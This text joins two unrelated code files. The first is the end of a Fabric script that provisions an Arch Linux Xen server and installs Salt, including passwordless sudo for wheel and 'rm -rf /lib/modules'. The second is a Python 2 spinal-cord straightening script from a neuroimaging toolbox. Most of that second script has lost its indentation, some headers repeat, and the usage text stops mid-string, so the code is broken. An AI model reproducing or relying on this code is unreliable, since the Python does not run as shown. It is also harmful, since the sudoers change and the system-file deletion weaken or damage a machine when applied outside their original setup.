    run("pacman --noconfirm -S yaourt")
    # create a user, named 'aur', to safely install AUR packages under fakeroot
    # uid and gid values auto increment from 1000
    # to prevent conflicts set the 'aur' user's gid and uid to 902
    run("groupadd -g 902 aur && useradd -u 902 -g 902 -G wheel aur")
    uncomment("/etc/sudoers", "wheel.*NOPASSWD")
    # still dealing with glibc crap
    run("rm -rf /lib/modules")
    run("pacman --noconfirm -Rns xe-guest-utilities kernel26-xen")
    sudo("yaourt --noconfirm -S xe-guest-utilities", user="aur")
    # finally we can upgrade glibc and run a successful full system upgrade
    run("pacman --noconfirm -Su")
    # tweak sshd_config (before reboot so it is restarted!) so fabric can sftp with contrib.files.put, see:
    # http://stackoverflow.com/questions/10221839/cant-use-fabric-put-is-there-any-server-configuration-needed
    sed("/etc/ssh/sshd_config", "Subsystem sftp /usr/lib/openssh/sftp-server", "Subsystem sftp internal-sftp")
    run("rc.d restart sshd", pty=False)
    # force netcfg to automatically connect to eth0 on reboot
    run("sed -i.bak -r -e 's/NETWORKS=\(last\)/NETWORKS=\(eth0\)/g' /etc/conf.d/netcfg")
    # configure new kernel and reboot
    sed("/etc/mkinitcpio.conf", "xen-", "xen_")  # see: https://projects.archlinux.org/mkinitcpio.git/commit/?id=5b99f78331f567cc1442460efc054b72c45306a6
    sed("/etc/mkinitcpio.conf", "usbinput", "usbinput fsck")
    run("mkinitcpio -p linux")
    reboot()
def install_salt(installer="aur"):
    """
    Install salt from the AUR.

    @param installer: which AUR package to build: "aur" (release) or
        "aur-git" (development snapshot); see SALT_INSTALLERS.
    @raise NotImplementedError: if ``installer`` is not a known choice.
    """
    if installer == "aur":
        sudo("yaourt --noconfirm -S salt", user="aur")
    elif installer == "aur-git":
        sudo("yaourt --noconfirm -S salt-git", user="aur")
    else:
        # Name the offending value instead of raising a bare, message-less
        # NotImplementedError -- much easier to debug from a fabric log.
        raise NotImplementedError("unknown salt installer: {0}".format(installer))
def start_salt():
    """
    See: http://salt.readthedocs.org/en/latest/topics/installation/arch.html
    Upload the bootmachine's bundled salt-states.
    Launch the salt-master daemon on the saltmaster server.
    Launch a salt-minion daemon on all servers, including the saltmaster.
    """
    is_master = env.host == env.master_server.public_ip
    # every host gets a minion config seeded from the template
    run("cp /etc/salt/minion.template /etc/salt/minion")
    if is_master:
        run("cp /etc/salt/master.template /etc/salt/master")
        sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-master @salt-minion")
        run("rc.d start salt-master", pty=False)
        # the master's own minion talks to the local master
        sed("/etc/salt/minion", "#master: salt", "master: localhost")
    else:
        master_name = env.master_server.name
        sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-minion")
        sed("/etc/salt/minion", "#master: salt", "master: {hostname}".format(hostname=master_name))
        run("rc.d start salt-minion", pty=False)
def restart_salt():
    """
    Restarts salt master and/or minions.

    On the master host the salt-master daemon is restarted first; the
    local salt-minion is restarted on every host.
    """
    on_master = env.host == env.master_server.public_ip
    with fabric_settings(warn_only=True):
        if on_master:
            sudo("rc.d restart salt-master", pty=False)
            # give the master a moment to come back up before the minion reconnects
            time.sleep(3)
        sudo("rc.d restart salt-minion", pty=False)
|
#!/usr/bin/env python
## @package sct_straighten_spinalcord
#
# - from spinal cord centerline (as nifti format), estimate deformation field with ANTS.
#
#
# Description about how the function works:
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
#
# USAGE
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i <data> -c <centerline>
#
# MANDATORY ARGUMENTS
# ---------------------------------------------------------------------------------------
# -i input volume.
# -c centerline (generated with sct_get_centerline).
#
# OPTIONAL ARGUMENTS
# ---------------------------------------------------------------------------------------
#
# -f           centerline fitting method: 'polynomial' or 'splines'. Default is 'splines'.
#
# EXAMPLES
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz
#
#
# DEPENDENCIES
# ---------------------------------------------------------------------------------------
# EXTERNAL PYTHON PACKAGES
# - nibabel: <http://nipy.sourceforge.net/nibabel/>
# - numpy: <http://www.numpy.org>
# - sympy : <http://sympy.org/fr/index.html>
# EXTERNAL SOFTWARE
# - FSL: <http://fsl.fmrib.ox.ac.uk/fsl/>
# - ANTS
#
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-07-05 by jcohen
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# TODO: fix bug of label creation when using splines (2014-06-05: error with data from Falk with small FOV along z)
# TODO: generate cross at both edge (top and bottom) and populate in between --> this will ensure better quality of the warping field.
# TODO: check if there is an overlap of labels, in case of high curvature and high density of cross along z.
# TODO: convert gap definition to mm (more intuitive than voxel)
# 2014-06-06: corrected bug related to small FOV volumes Solution: reduced spline order (3), computation of a lot of point (1000)
## Create a structure to pass important user parameters to the main function
class param:
    """Container for the user-tunable parameters of the script."""
    def __init__(self):
        # debugging / verbosity
        self.debug = 0
        self.verbose = 1
        # centerline fitting
        self.deg_poly = 10  # maximum degree of polynomial function for fitting centerline
        self.fitting_method = 'splines'  # splines | polynomial
        # landmark geometry
        self.gapxy = 20  # size of cross in x and y direction for the landmarks
        self.gapz = 15  # gap between landmarks along z
        self.padding = 30  # pad input volume so landmarks outside the FOV (due to curvature) are kept
        # warping and cleanup
        self.interpolation_warp = 'spline'
        self.remove_temp_files = 1  # remove temporary files
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
import sct_utils as sct
from sct_utils import fsloutput
from sct_nurbs import NURBS
import nibabel
import numpy
from scipy import interpolate # TODO: check if used
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
# Check that the external dependencies (FSL and ANTS) are installed before doing any work.
sct.check_if_installed('flirt -help','FSL')
sct.check_if_installed('WarpImageMultiTransform -h','ANTS')
#=======================================================================================================================
# main
#=======================================================================================================================
def main():
# Initialization
fname_anat = ''
fname_centerline = ''
gapxy = param.gapxy
gapz = param.gapz
padding = param.padding
remove_temp_files = param.remove_temp_files
centerline_fitting = param.fitting_method
verbose = param.verbose
interpolation_warp = param.interpolation_warp
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
print path_sct
# extract path of the script
path_script = os.path.dirname(__file__)+'/'
# Parameters for debug mode
if param.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
#fname_anat = path_sct+'/testing/data/11shortFOV/t1_cropped_short.nii.gz'
#fname_centerline = path_sct+'/testing/data/11shortFOV/spine_cropped_short.nii.gz'
fname_anat = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
fname_centerline = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
remove_temp_files = 0
centerline_fitting = 'splines'
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
verbose = 2
# Check input param
try:
opts, args = getopt.getopt(sys.argv[1:],'hi:c:r:w:f:v:')
except getopt.GetoptError as err:
print str(err)
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ('-i'):
fname_anat = arg
elif opt in ('-c'):
fname_centerline = arg
elif opt in ('-r'):
remove_temp_files = int(arg)
elif opt in ('-w'):
interpolation_warp = str(arg)
elif opt in ('-f'):
centerline_fitting = str(arg)
elif opt in ('-v'):
verbose = int(arg)
# display usage if a mandatory argument is not provided
if fname_anat == '' or fname_centerline == '':
usage()
# Display usage if optional arguments are not correctly provided
if centerline_fitting == '':
centerline_fitting = 'splines'
elif not centerline_fitting == '' and not centerline_fitting == 'splines' and not centerline_fitting == 'polynomial':
print '\n \n -f argument is not valid \n \n'
usage()
# check existence of input files
sct.check_file_exist(fname_anat)
sct.check_file_exist(fname_centerline)
# check interp method
if interpolation_warp == 'spline':
interpolation_warp_ants = '--use-BSpline'
elif interpolation_warp == 'trilinear':
interpolation_warp_ants = ''
elif interpolation_warp == 'nearestneighbor':
interpolation_warp_ants = '--use-NN'
else:
print '\WARNING: Interpolation method not recognized. Using: '+param.interpolation_warp
interpolation_warp_ants = '--use-BSpline'
# Display arguments
print '\nCheck input arguments...'
print ' Input volume ...................... '+fname_anat
print ' Centerline ........................ '+fname_centerline
print ' Centerline fitting option ......... '+centerline_fitting
print ' Final interpolation ............... '+interpolation_warp
print ' Verbose ........................... '+str(verbose)
print ''
# if verbose 2, import matplotlib
if verbose == 2:
import matplotlib.pyplot as plt
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp)
sct.run('cp '+fname_centerline+' '+path_tmp)
# go to tmp folder
os.chdir(path_tmp)
# Open centerline
#==========================================================================================
# Change orientation of the input centerline into RPI
print '\nOrient centerline to RPI orientation...'
fname_centerline_orient = 'tmp.centerline_rpi' + ext_centerline
sct.run('sct_orientation -i ' + file_centerline + ext_centerline + ' -o ' + fname_centerline_orient + ' -orientation RPI')
print '\nGet dimensions of input centerline...'
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
print '.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz)
print '.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm'
print '\nOpen centerline volume...'
file = nibabel.load(fname_centerline_orient)
data = file.get_data()
# loop across z and associate x,y coordinate with the point having maximum intensity
x_centerline = [0 for iz in range(0, nz, 1)]
y_centerline = [0 for iz in range(0, nz, 1)]
z_centerline = [iz for iz in range(0, nz, 1)]
x_centerline_deriv = [0 for iz in range(0, nz, 1)]
y_centerline_deriv = [0 for iz in range(0, nz, 1)]
z_centerline_deriv = [0 for iz in range(0, nz, 1)]
# Two possible scenario:
# 1. the centerline is probabilistic: each slice contains voxels with the probability of containing the centerline [0:...:1]
# We only take the maximum value of the image to aproximate the centerline.
# 2. The centerline/segmentation image contains many pixels per slice with values {0,1}.
# We take all the points and approximate the centerline on all these points.
x_seg_start, y_seg_start = (data[:,:,0]>0).nonzero()
x_seg_end, y_seg_end = (data[:,:,-1]>0).nonzero()
# check if centerline covers all the image
if len(x_seg_start)==0 or len(x_seg_end)==0:
print '\nERROR: centerline/segmentation must cover all "z" slices of the input image.\n' \
'To solve the problem, you need to crop the input image (you can use \'sct_crop_image\') and generate one' \
'more time the spinal cord centerline/segmentation from this cropped image.\n'
usage()
# X, Y, Z = ((data<1)*(data>0)).nonzero() # X is empty if binary image
# if (len(X) > 0): # Scenario 1
# for iz in range(0, nz, 1):
# x_centerline[iz], y_centerline[iz] = numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape)
# else: # Scenario 2
# for iz in range(0, nz, 1):
# x_seg, y_seg = (data[:,:,iz]>0).nonzero()
# x_centerline[iz] = numpy.mean(x_seg)
# y_centerline[iz] = numpy.mean(y_seg)
# # TODO: find a way to do the previous loop with this, which is more neat:
# # [numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape) for iz in range(0,nz,1)]
# get center of mass of the centerline/segmentation
print '\nGet center of mass of the centerline/segmentation...'
for iz in range(0, nz, 1):
x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(data[:,:,iz])
# clear variable
del data
# Fit the centerline points with the kind of curve given as argument of the script and return the new fitted coordinates
if centerline_fitting == 'splines':
x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_centerline(x_centerline,y_centerline,z_centerline)
elif centerline_fitting == 'polynomial':
x_centerline_fit, y_centerline_fit, polyx, polyy = polynome_centerline(x_centerline,y_centerline,z_centerline)
if verbose == 2:
# plot centerline
ax = plt.subplot(1,2,1)
plt.plot(x_centerline, z_centerline, 'b:', label='centerline')
plt.plot(x_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('x')
plt.ylabel('z')
ax = plt.subplot(1,2,2)
plt.plot(y_centerline, z_centerline, 'b:', label='centerline')
plt.plot(y_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('y')
plt.ylabel('z')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
plt.show()
# Get coordinates of landmarks along curved centerline
#==========================================================================================
print '\nGet coordinates of landmarks along curved centerline...'
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy.
# find derivative of polynomial
step_z = round(nz/gapz)
#iz_curved = [i for i in range (0, nz, gapz)]
iz_curved = [i*step_z for i in range (0, gapz)]
iz_curved.append(nz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
landmark_curved = [ [ [ 0 for i in range(0,3)] for i in range(0,5) ] for i in iz_curved ]
# print x_centerline_deriv,len(x_centerline_deriv)
# landmark[a][b][c]
# a: index along z. E.g., the first cross with have index=0, the next index=1, and so on...
# b: index of element on the cross. I.e., 0: center of the cross, 1: +x, 2 -x, 3: +y, 4: -y
# c: dimension, i.e., 0: x, 1: y, 2: z
# loop across index, which corresponds to iz (points along the centerline)
if centerline_fitting=='polynomial':
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set x and z coordinates for landmarks +x and -x
landmark_curved[index][1][2], landmark_curved[index][1][0], landmark_curved[index][2][2], landmark_curved[index][2][0] = get_points_perpendicular_to_curve(polyx, polyx.deriv(), iz_curved[index], gapxy)
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
landmark_curved[index][3][2], landmark_curved[index][3][1], landmark_curved[index][4][2], landmark_curved[index][4][1] = get_points_perpendicular_to_curve(polyy, polyy.deriv(), iz_curved[index], gapxy)
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
elif centerline_fitting=='splines':
for index in range(0, n_iz_curved, 1):
# calculate d (ax+by+cz+d=0)
# print iz_curved[index]
a=x_centerline_deriv[iz_curved[index]]
b=y_centerline_deriv[iz_curved[index]]
c=z_centerline_deriv[iz_curved[index]]
x=x_centerline_fit[iz_curved[index]]
y=y_centerline_fit[iz_curved[index]]
z=iz_curved[index]
d=-(a*x+b*y+c*z)
#print a,b,c,d,x,y,z
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set x and z coordinates for landmarks +x and -x, forcing de landmark to be in the orthogonal plan and the distance landmark/curve to be gapxy
x_n=Symbol('x_n')
landmark_curved[index][2][0],landmark_curved[index][1][0]=solve((x_n-x)**2+((-1/c)*(a*x_n+b*y+d)-z)**2-gapxy**2,x_n) #x for -x and +x
landmark_curved[index][1][2]=(-1/c)*(a*landmark_curved[index][1][0]+b*y+d) #z for +x
landmark_curved[index][2][2]=(-1/c)*(a*landmark_curved[index][2][0]+b*y+d) #z for -x
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
y_n=Symbol('y_n')
landmark_curved[index][4][1],landmark_curved[index][3][1]=solve((y_n-y)**2+((-1/c)*(a*x+b*y_n+d)-z)**2-gapxy**2,y_n) #y for -y and +y
landmark_curved[index][3][2]=(-1/c)*(a*x+b*landmark_curved[index][3][1]+d)#z for +y
landmark_curved[index][4][2]=(-1/c)*(a*x+b*landmark_curved[index][4][1]+d)#z for -y
# #display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'g')
# ax.plot(x_centerline, y_centerline,z_centerline, 'r')
# ax.plot([landmark_curved[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
# Get coordinates of landmarks along straight centerline
#==========================================================================================
print '\nGet coordinates of landmarks along straight centerline...'
landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
iz_straight = [0 for i in range (0,gapz+1)]
#print iz_straight,len(iz_straight)
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
iz_curved[index] - iz_curved[index-1]]
# compute norm of this vector
norm_vector_centerline = numpy.linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline,0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_straight[index][0][0], landmark_straight[index][0][1], landmark_straight[index][0][2] = x0, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +x
landmark_straight[index][1][0], landmark_straight[index][1][1], landmark_straight[index][1][2] = x0 + gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks -x
landmark_straight[index][2][0], landmark_straight[index][2][1], landmark_straight[index][2][2] = x0-gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +y
landmark_straight[index][3][0], landmark_straight[index][3][1], landmark_straight[index][3][2] = x0, y0+gapxy, iz_straight[index]
# set x, y and z coordinates for landmarks -y
landmark_straight[index][4][0], landmark_straight[index][4][1], landmark_straight[index][4][2] = x0, y0-gapxy, iz_straight[index]
# # display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# #ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'r')
# ax.plot([landmark_straight[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
#
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
print '\nPad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV...'
sct.run('c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz')
# TODO: don't pad input volume: no need for that! instead, try to increase size of hdr when saving landmarks.
# Open padded centerline for reading
print '\nOpen padded centerline for reading...'
file = nibabel.load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# initialize landmark value
landmark_value = 1
# Loop across cross index
for index in range(0, n_iz_curved, 1):
# loop across cross element index
for i_element in range(0, 5, 1):
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved[index][i_element][0])), int(round(landmark_curved[index][i_element][1])), int(round(landmark_curved[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index][i_element][0])), int(round(landmark_straight[index][i_element][1])), int(round(landmark_straight[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# increment landmark value
landmark_value = landmark_value + 1
# Write NIFTI volumes
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
print '\nWrite NIFTI volumes...'
img = nibabel.Nifti1Image(data_curved_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_curved.nii.gz')
print '.. File created: tmp.landmarks_curved.nii.gz'
img = nibabel.Nifti1Image(data_straight_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_straight.nii.gz')
print '.. File created: tmp.landmarks_straight.nii.gz'
# Estimate deformation field by pairing landmarks
#==========================================================================================
# Dilate landmarks (because nearest neighbour interpolation will be later used, therefore some landmarks may "disapear" if they are single points)
#print '\nDilate landmarks...'
#sct.run(fsloutput+'fslmaths tmp.landmarks_curved.nii -kernel box 3x3x3 -dilD tmp.landmarks_curved_dilated -odt short')
#sct.run(fsloutput+'fslmaths tmp.landmarks_straight.nii -kernel box 3x3x3 -dilD tmp.landmarks_straight_dilated -odt short')
# Estimate rigid transformation
print '\nEstimate rigid transformation between paired landmarks...'
sct.run('ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt')
# Apply rigid transformation
print '\nApply rigid transformation to curved landmarks...'
sct.run('WarpImageMultiTransform 3 tmp.landmarks_curved.nii.gz tmp.landmarks_curved_rigid.nii.gz -R tmp.landmarks_straight.nii.gz tmp.curve2straight_rigid.txt --use-NN')
# Estimate b-spline transformation curve --> straight
print '\nEstimate b-spline transformation: curve --> straight...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
print('>> '+cmd)
commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
print '\nEstimate b-spline transformation: straight --> curve...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R tmp.landmarks_straight.nii.gz -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
print('>> '+cmd)
commands.getstatusoutput(cmd)
#print '\nPad input image...'
#sct.run('c3d '+fname_anat+' -pad '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox 0 -o tmp.anat_pad.nii')
# Unpad landmarks...
# THIS WAS REMOVED ON 2014-06-03 because the output data was cropped at the edge, which caused landmarks to sometimes disappear
# print '\nUnpad landmarks...'
# sct.run('fslroi tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz '+str(padding)+' '+str(nx)+' '+str(padding)+' '+str(ny)+' '+str(padding)+' '+str(nz))
# Apply deformation to input image
print '\nApply transformation to input image...'
sct.run('WarpImageMultiTransform 3 '+file_anat+ext_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# sct.run('WarpImageMultiTransform 3 '+fname_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight_crop.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
print '\nGenerate output file (in current folder)...'
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz','','warp_curve2straight',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz','','warp_straight2curve',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz','',file_anat+'_straight',ext_anat) # straightened anatomic
# come back to parent folder
os.chdir('..')
# Remove temporary files
if remove_temp_files == 1:
print('\nRemove temporary files...')
sct.run('rm -rf '+path_tmp)
print '\nDone!\n'
#=======================================================================================================================
# get_points_perpendicular_to_curve
#=======================================================================================================================
# output: x1, y1, x2, y2
#=======================================================================================================================
# get_points_perpendicular_to_curve
#=======================================================================================================================
# output: x1, y1, x2, y2
def get_points_perpendicular_to_curve(poly, dpoly, x, gap):
    """
    Return two points located at distance `gap` from the curve `poly` at
    abscissa `x`, on the line perpendicular to the tangent of the curve.

    poly:  callable giving the curve ordinate, y = poly(x)
    dpoly: callable giving the derivative of poly
    x:     abscissa at which the perpendicular is taken
    gap:   distance between the curve and each returned point
    Returns (x1, y1, x2, y2): the two points, one on each side of the curve.
    """
    # get y: ordinate that intersects the curve and the line
    y = poly(x)
    # BUG FIX: the original printed a TODO and then crashed with a NameError
    # when the derivative was null. A null tangent slope means the
    # perpendicular line is vertical, so the two points are directly above
    # and below the curve.
    if dpoly(x) == 0:
        return x, y + gap, x, y - gap
    # get a: slope of the line perpendicular to the tangent of the curve at a specific point
    a = -1/dpoly(x)
    # convert slope to radian
    a_rad = numpy.arctan(a)
    # get coordinates of the two points on the line at a distance "gap" from the curve
    x1 = x + ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
    y1 = y + ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
    x2 = x - ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
    y2 = y - ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
    return x1, y1, x2, y2
#=======================================================================================================================
# B-Spline fitting
#=======================================================================================================================
def b_spline_centerline(x_centerline,y_centerline,z_centerline):
"""Give a better fitting of the centerline than the method 'spline_centerline' using b-splines"""
print '\nFit centerline using B-spline approximation'
points = [[x_centerline[n], y_centerline[n], z_centerline[n]] for n in range(len(x_centerline))]
nurbs = NURBS(3, 3000, points) # BE very careful with the spline order that you choose : if order is too high ( > 4 or 5) you need to set a higher number of Control Points (cf sct_nurbs ). For the third argument (number of points), give at least len(z_centerline)+500 or higher
P = nurbs.getCourbe3D()
x_centerline_fit = P[0]
y_centerline_fit = P[1]
Q = nurbs.getCourbe3D_deriv()
x_centerline_deriv = Q[0]
y_centerline_deriv = Q[1]
z_centerline_deriv = Q[2]
return x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
#=======================================================================================================================
# Polynomial fitting
#=======================================================================================================================
def polynome_centerline(x_centerline,y_centerline,z_centerline):
"""Fit polynomial function through centerline"""
# Fit centerline in the Z-X plane using polynomial function
print '\nFit centerline in the Z-X plane using polynomial function...'
coeffsx = numpy.polyfit(z_centerline, x_centerline, deg=param.deg_poly)
polyx = numpy.poly1d(coeffsx)
x_centerline_fit = numpy.polyval(polyx, z_centerline)
#Fit centerline in the Z-Y plane using polynomial function
print '\nFit centerline in the Z-Y plane using polynomial function...'
coeffsy = numpy.polyfit(z_centerline, y_centerline, deg=param.deg_poly)
polyy = numpy.poly1d(coeffsy)
y_centerline_fit = numpy.polyval(polyy, z_centerline)
return x_centerline_fit,y_centerline_fit,polyx,polyy
#=======================================================================================================================
# usage
#=======================================================================================================================
def usage():
print '\n' \
''+os.path.basename(__file__)+'\n' \
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n' \
'Part of the Spinal Cord Toolbox <https://sourceforge.net/projects/spinalcordtoolbox>\n' \
'\n'\
'DESCRIPTION\n' \
' This function straightens the spinal cord using its centerline (or segmentation).\n' \
'\n'\
'USAGE\n' \
' '+os.path.basename(__file__)+' -i <data> -c <centerline>\n' \
'\n'\
'MANDATORY ARGUMENTS\n' \
' -i input volume.\n' \
' -c centerline or segmentation. Centerline must cover each "z" slices.\n' \
'\n'\
'OPTIONAL ARGUMENTS\n' \
